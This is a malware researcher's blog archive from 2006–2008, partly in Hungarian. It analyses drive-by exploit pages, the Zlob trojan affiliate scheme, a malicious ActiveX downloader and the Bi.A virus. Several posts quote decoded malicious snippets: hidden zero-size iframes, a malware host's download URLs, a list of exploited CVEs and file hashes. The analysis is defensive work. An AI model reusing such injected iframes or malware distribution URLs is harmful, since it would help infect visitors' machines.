Nagy Ferenc László's official blog - malware

Storm now called storm

nospam@example.com (Nagy Ferenc László) — Wed, 09 Apr 2008 01:15:00 +0200

Web developer kiterjesztés

nospam@example.com (Nagy Ferenc László) — Thu, 03 Apr 2008 01:03:00 +0200

Tegyük fel, hogy kapunk egy linket egy vírusra. Tudom, hogy ez nem gyakori, de azért hébe-hóba, naponta néhányszor előfordul. Mondjuk legyen exploitos, amit javascripttel kódolnak, hogy olvashatatlan legyen. Ha megnézzük az oldal forrását, akkor ilyesmit látunk:

<body>
<script language="JavaScript">
<!--
function Du8LaL7iG(GVYkI8cCN,eYkRMXinq){var CKUQx5Y47;va...
Du8LaL7iG('95b39bAC9E9aa2b85fBBAAa0A59A5c6B6DAD9ea992a29...
//-->
</script>
</body>

Szép. Akkor most nézzük meg a Web developer nevű firefoxos kiterjesztéstől kapott View Generated Source menüpontunkat!

<body>
<script language="JavaScript">
<!--
function Du8LaL7iG(GVYkI8cCN,eYkRMXinq){var CKUQx5Y47;va...
Du8LaL7iG('95b39bAC9E9aa2b85fBBAAa0A59A5c6B6DAD9ea992a29...
//-->
</script><iframe src="http://207.10.234.217/cgi-bin/mail...
</body>

Hohó, ez egyszerűbb, mint textareákkal vacakolni!

Ui: Megtörténhet, hogy ebből a bejegyzésből nem értettél semmit. Ha így van, ne keresd sokáig magadban a hibát, inkább olvass mást!

2 Japanese 1 Finger 9 Exploits

nospam@example.com (Nagy Ferenc László) — Fri, 29 Feb 2008 03:47:53 +0100

There is a website which is agressively advertised in spam. It contains an unsavory (well, matter of taste) video. But what's the business in it? You guessed it (I hope): http:// 2j1f . com/ installs malware.

The main page contains two encoded scripts. The second one (near to the end) looks like a traffic counter. Really. Let's see the first one (after decoding):
<script>window.status="Done"</script>
<iframe src="header_01.gif" width=0 height=0></iframe>

The file called header_01.gif is not an image but a script, and is also encoded. The decoded code is:
<script>window.status="Done"</script>
<iframe src="http:// currentsession . net /session/index.php?usermode=start&action=level3" width=0 height=0></iframe>

Okay, we now have a 45 kilobyte script full of exploits. Summary:
CVE-2008-0625 Yahoo! Music Jukebox Yahoo! MediaGrid ActiveX control vulnerability
downloads: http:// currentsession . net /session/yahoofile.php?action=download&mode=abc
CVE-2007-3147 Yahoo! Webcam image upload ActiveX control vulnerability
downloads: see above
CVE-2007-2222 Microsoft Speech API ActiveX control vulnerability
downloads: http:// currentsession . net /session/dspeechfile.php?action=download&mode=abc
CVE-2008-0660 FaceBook PhotoUploader vulnerability
downloads: http:// currentsession . net /session/facebfile.php?action=download&mode=abc
MILW0RM:5102 another FaceBook PhotoUploader vulnerability
downloads: see above

At the end there is a script encoded by xor algorithm. It's a collection of exploits and is borrowed straight from MPack's megapack1.php (~ 0.94 version). Summary:
CVE-2006-3730 WebViewFolderIcon
CVE-2006-0003 MDAC
CVE-2007-0015 Quicktime RTSP
CVE-2006-5198 Winzip
These download http:// currentsession . net /session/file.php?action=download&mode=abc

File.php, yahoofile.php, dspeechfile.php and facebfile.php currently returns the same file (md5: 712bc609da304f1d25f2fec6a5d62b94), which is some downloader.

The motivation behind 90 Day Jane

nospam@example.com (Nagy Ferenc László) — Thu, 14 Feb 2008 23:52:00 +0100

In the past days many people and journalists wondered why somebody created a blog where she allegedly wanted to record the events and feelings of her last 90 days of life. (After that she wanted to commit suicide.) Is it a joke? Is it marketing? Looks like the solution is very simple. If you go to the blog now, you will see a "Video ActiveX Object Error" instead of the videos:

The file that can be downloaded now (from my IP address) has 2077e236b9cbe7133f8c74876c41190e as MD5, and is detected by 11 of 32 scanners on VirusTotal. (The others need to be updated.)

Update: Or maybe it's not the blogger's motivation. Maybe what I checked is a copy of the original blog, which copy was created by trojan distributors. As the original addresses (www.90dayjane.com and www.90dayjane.blogspot.com) are not available now, it's what will be found by the searchers.

Storm-nosztalgia

nospam@example.com (Nagy Ferenc László) — Thu, 01 Nov 2007 00:05:00 +0100

Hiányzik a röhögő macska, manapság csak csontvázas vírusokat kapok.

A Zlob trójai beszél magyarul

nospam@example.com (Nagy Ferenc László) — Tue, 18 Sep 2007 01:04:01 +0200

Úgy ahogy.

I'm a Zlob distributor

nospam@example.com (Nagy Ferenc László) — Wed, 22 Nov 2006 01:58:00 +0100

This is a screenshot of my personal forum (before I deleted this post):

The link and the picture redirects to a site, which is the number 1421 affiliate of the Zlob business. The site contains links to infected videogalleries, and all the links contain this number, so the Zlob-people can pay for the traffic.

Don't you know Zlob? Good for you. Trojan.DL.Zlob is a downloader trojan that usually disguises itself as a codec or xxx password manager. Creators nowadays register at least 10 new hosting domains per month, with names like *codec, *encoder or similar. The programs are different on the different domains, and are changed twice a day, so it's very hard for a virus scanner to remain up to date.

The installer downloads other components from the network, that usually show „Your PC is infected” popups (this component is also known as Trojan.Renos). Of course the popups always know what „antivirus” you should use to remove it. Recent proposals are: SpyFalcon, SpyAxe, SpywareQuake, VirusBurst or VirusBursters. The last ones are especially sticky for my employer, because the name of our company and our flagship product is VirusBuster. The difference is that we are in this list, while VirusBurst is in this list.

PS: Looks like VB100% results are classified. You have to create a free password or you can pick one from here.
PS2: An Overview of the FreeVideo Player Trojan by Internet Storm Center
Update: The animal described at the PS2 link is not Trojan.Zlob, but Trojan.DNSChanger. Same idea but different payload. Sorry.

Kerüld a 35mb.com webhelyet!

nospam@example.com (Nagy Ferenc László) — Sun, 21 May 2006 21:50:00 +0200

Na, rövid leszek. Valahová nagyon eltűnt a Nosza Legyél Má' Te Is Milijomos című számítógépes játék. Sikerült egy utolsó linket találnom egy blogban, mely a download.35mb.com webhelyre mutatott. Ami rögtön érdekes volt, hogy az oldal kizárólag Internet Explorerrel hajlandó működni, azzal pedig ActiveX programot akar telepíteni a gépünkre. „Nyugi, semmi vírus meg ilyesmit nem kapsz be vele.” – írta a blog tulajdonosa. Naivitás rulez. :-) A Kaspersky antivírus Trojan-Downloader.Win32.VB.en néven ismeri fel az ActiveX-et, ami a www.impregnable.net oldalról letölt egy Trojan-Clicker.Win32.VB.gl néven felismert állományt, ami tovább letölt egy Trojan.Win32.StartPage.kk nevűt.

Ha az Internet Explorer megkérdezi, hogy szeretnénk-e installálni programot, ami programok vírusokat és egyéb kártevőket tartalmazhatnak, akkor mindig azt kell válaszolni, hogy nem. Ha harmincszor kérdezi meg, akkor harmincszor kell nemet válaszolni. Ha a weblap azt írja, hogy „Figyi, tudom, hogy meg fogja kérdezni az Internet Explorer, hogy installálni akarod-e a programot, ami programok esetleg vírusokat és egyéb kártevőket tartalmazhatnak, de ez normális, azt jelenti, hogy minden jól megy, és nyugodtan nyomjál YES-t!”, akkor is NO-t nyomjál! Amúgy meg használj Firefoxot, az nem kérdez hülyeségeket. Oké, nem fogod tudni használni a 35mb.com-ot, de megéri legyőzni a kíváncsiságodat. Amúgy az NLMTIM_1_4.zip már régen nincs rajta, de ezt persze nem árulta volna el az elején, mert ki telepít akkor kémprogramokat?

Virus hoax without chain letter

nospam@example.com (Nagy Ferenc László) — Thu, 27 Apr 2006 19:58:56 +0200

Once in a while hoaxes break out of their usual chain letter habitat and reach a more official media. What is rarer, that the journalist creates a new one from misinterpreted and unvetted information, like in this article. As you can read in F-Secure's weblog, there is no known mobile virus/worm that sends premium rate SMS.

Bi.A virus helps fix Linux kernel

nospam@example.com (Nagy Ferenc László) — Wed, 19 Apr 2006 13:47:00 +0200

See Torvalds creates patch for cross-platform virus.

Bi.A (my description, Kaspersky description) is a cross-platform Linux/Win32 virus reported by Kaspersky Lab earlier this month. Of course, it's not the first virus in its kind, other Win32/Linux viruses are Winux/Lindose/Peelf and D version of Simile/Etap.

It turned out, that Bi.A does not work with newest Linux kernels (starting from 2.6.16 according to Linus). This is because the kernel destroys one of the registers' value due to faulty optimisation. I don't know any official specification on x86 binary system call interface, but it's expected that the kernel do not modify registers that are not output parameters. So Linus fixed the kernel and future versions will correctly run this virus and any similar programs that use the ftruncate system call through int 0x80 instead of libc functions.

Note that the NewsForge article assumes that Bi.A is an old virus, because it uses old system calls, but it's pretty common that virus writers use old methods as long as they work.

Szólj, ha lefordítsam neked magyarra!

Proxies for the underworld: I-Worm.Locksky.AS

nospam@example.com (Nagy Ferenc László) — Thu, 02 Mar 2006 21:23:20 +0100

Wait 6 months patiently, then you can read it: http://www.virusbtn.com/virusbulletin/archive/2006/03/vb200603-locksky

Dear Amazon.com Customer,

nospam@example.com (Nagy Ferenc László) — Sat, 24 Dec 2005 13:57:42 +0100

We've noticed that customers who have purchased The Art of Computer Virus Research and Defense by Peter Szor also purchased books by Kevin D. Mitnick.

Balanced reading.